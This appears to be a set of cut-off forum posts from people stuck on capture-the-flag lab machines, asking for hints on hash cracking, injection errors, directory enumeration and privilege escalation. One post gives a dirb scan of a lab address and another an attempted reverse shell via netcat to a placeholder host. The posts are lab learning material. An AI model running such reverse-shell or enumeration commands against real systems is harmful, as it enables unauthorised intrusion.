Is anyone haveing issues with the decrypted hash for the user? It does seem to be working when trying to s**o as that user. the hash is the same and it decrypts to the same thing every time, however its comming back with sorry try again. I have trie…
I think im getting same thing when i try to inject. can someone PM to help limp along?
every time i try inject on R******r.php page i get "Something went wrong error", any hints how to get past this?
ca someone PM me concerning format of the file...all im getting is internal server error. Even after creating the 3 elememnets and ensuring case sensativity. What am i doing incorrect? are there resources available to assist? The format from OSwap 2…
Can someone expound on how to narrow down where to look for vector for initial foothold? Dirbuster gave a lot of output so even just looking at the 200 response code is overwhelming 😴 to say the least. Every directory opens so far is bogus!!!
I am also stuch have root. looked in the usb and root.txt but i gues not enough sill to figure out how to get the deleted file or the content. I am totaly out of ideas and no longer sure if im even looking in the right place anymore.
so far i am running this cmd....dirb http://10.10.10.56 /usr/share/wordlists/dirb/big.txt -x /usr/share/wordlists/dirb/extensions_common.txt
It is still running, i hope this is the right direction as this is a taking a verylong time!!
Ok i see the scripts directory. Have used the linenum.sh script. I have tried /bin/sh -i | nc x.x.x.x wich failed.dont seem to be a way to get python to spawn a shell. cant change /etc/profile as i am not root. Can u give a next hint to get out of j…
i am using the basic priv esc cheat sheet from got milk. I still cant see the way to move from www-data to priv user. please any suggestion other than try harder will help! I have been enumerating for days and i just cat see the way.